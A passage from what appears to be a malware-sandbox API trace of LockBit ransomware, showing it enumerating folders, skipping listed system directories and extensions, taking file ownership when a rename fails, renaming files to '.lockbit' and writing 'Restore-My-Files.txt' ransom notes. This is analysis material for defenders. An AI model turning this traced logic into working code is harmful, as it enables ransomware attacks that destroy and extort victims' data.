lstrcmpiW (lpString1="ntuser.dat.log", lpString2="auxpad.xml") returned 1 [0080.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="auxpad.xml") returned 1 [0080.210] lstrcmpiW (lpString1="autorun.inf", lpString2="auxpad.xml") returned -1 [0080.210] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0080.210] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned=".xml" [0080.210] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.211] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.211] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.211] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.lockbit") returned 84 [0080.212] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.212] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.lockbit")) returned 0 [0080.212] GetLastError () returned 0x5 [0080.212] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.212] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.212] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.213] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.213] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.213] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b8, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.213] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.213] NtQueryInformationFile (in: FileHandle=0x3b8, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0080.227] NtClose (Handle=0x3b8) returned 0x0 [0080.228] RtlFreeAnsiString (AnsiString="\\") [0080.228] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b8) returned 1 [0080.228] malloc (_Size=0x200) returned 0x53fcc0 [0080.228] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0080.228] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0080.228] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0080.228] CloseHandle (hObject=0x3b8) returned 1 [0080.228] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0080.228] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0080.229] free (_Block=0x53fcc0) [0080.229] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.229] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.lockbit")) returned 1 [0080.230] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0080.231] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.231] malloc (_Size=0x40068) returned 0x206b860 [0080.231] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=212) returned 1 [0080.231] ReadFile (in: hFile=0x3b8, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0080.232] GetLastError () returned 0x3e5 [0080.232] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0080.232] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0080.232] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0080.232] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.233] malloc (_Size=0x40068) returned 0x3940048 [0080.233] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 0x0 [0080.234] GetLastError () returned 0x3e5 [0080.234] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="keypad", cAlternateFileName="")) returned 1 [0080.234] lstrcmpiW (lpString1=".", lpString2="keypad") returned -1 [0080.234] lstrcmpiW (lpString1="..", lpString2="keypad") returned -1 [0080.234] lstrcmpiW (lpString1="keypad", lpString2="$windows.~bt") returned 1 [0080.234] lstrcmpiW (lpString1="keypad", lpString2="intel") returned 1 [0080.234] lstrcmpiW (lpString1="keypad", lpString2="msocache") returned -1 [0080.234] lstrcmpiW (lpString1="keypad", lpString2="$recycle.bin") returned 1 [0080.234] lstrcmpiW (lpString1="keypad", lpString2="$windows.~ws") returned 1 [0080.234] lstrcmpiW (lpString1="keypad", lpString2="tor browser") returned -1 [0080.234] lstrcmpiW (lpString1="keypad", lpString2="boot") returned 1 [0080.234] lstrcmpiW (lpString1="keypad", lpString2="system volume information") returned -1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="perflogs") returned -1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="google") returned 1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="application data") returned 1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="windows") returned -1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="windows.old") returned -1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="appdata") returned 1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="Windows nt") returned -1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="Msbuild") returned -1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="Microsoft") returned -1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="All users") returned 1 [0080.235] lstrcmpiW (lpString1="keypad", lpString2="mozilla") returned -1 [0080.235] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 72 [0080.235] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*") returned 74 [0080.235] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0080.235] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0080.235] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0080.236] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0080.236] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0080.236] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0080.236] lstrcmpiW (lpString1=".", lpString2="ea.xml") returned -1 [0080.236] lstrcmpiW (lpString1="..", lpString2="ea.xml") returned -1 [0080.236] PathFindExtensionW (pszPath="ea.xml") returned=".xml" [0080.236] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.236] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.237] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.238] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.238] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.238] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ea.xml") returned 1 [0080.238] lstrcmpiW (lpString1="ntldr", lpString2="ea.xml") returned 1 [0080.238] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ea.xml") returned 1 [0080.238] lstrcmpiW (lpString1="bootsect.bak", lpString2="ea.xml") returned -1 [0080.238] lstrcmpiW (lpString1="autorun.inf", lpString2="ea.xml") returned -1 [0080.238] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\") returned="" [0080.239] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned=".xml" [0080.239] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.239] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.239] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.240] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.240] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.240] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.240] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.lockbit") returned 87 [0080.240] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.240] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.lockbit")) returned 0 [0080.240] GetLastError () returned 0x5 [0080.240] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.241] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.241] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.241] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.241] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.241] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c4, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.242] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.242] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0080.258] NtClose (Handle=0x3c4) returned 0x0 [0080.258] RtlFreeAnsiString (AnsiString="\\") [0080.258] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c4) returned 1 [0080.258] malloc (_Size=0x200) returned 0x53fcc0 [0080.258] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0080.258] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.258] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.258] CloseHandle (hObject=0x3c4) returned 1 [0080.258] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0080.259] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0080.259] free (_Block=0x53fcc0) [0080.259] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.260] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.lockbit")) returned 1 [0080.260] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.260] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.260] malloc (_Size=0x40068) returned 0x3940048 [0080.260] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=384) returned 1 [0080.261] ReadFile (in: hFile=0x3c4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0080.262] GetLastError () returned 0x3e5 [0080.262] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 1 [0080.262] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\Restore-My-Files.txt") returned 93 [0080.262] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0080.262] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.262] malloc (_Size=0x40068) returned 0x20ebb50 [0080.263] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x2064f58*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 1 [0080.265] GetLastError () returned 0x3e5 [0080.265] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="keypadbase.xml", cAlternateFileName="")) returned 1 [0080.265] lstrcmpiW (lpString1=".", lpString2="keypadbase.xml") returned -1 [0080.265] lstrcmpiW (lpString1="..", lpString2="keypadbase.xml") returned -1 [0080.265] PathFindExtensionW (pszPath="keypadbase.xml") returned=".xml" [0080.265] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.265] lstrcmpiW 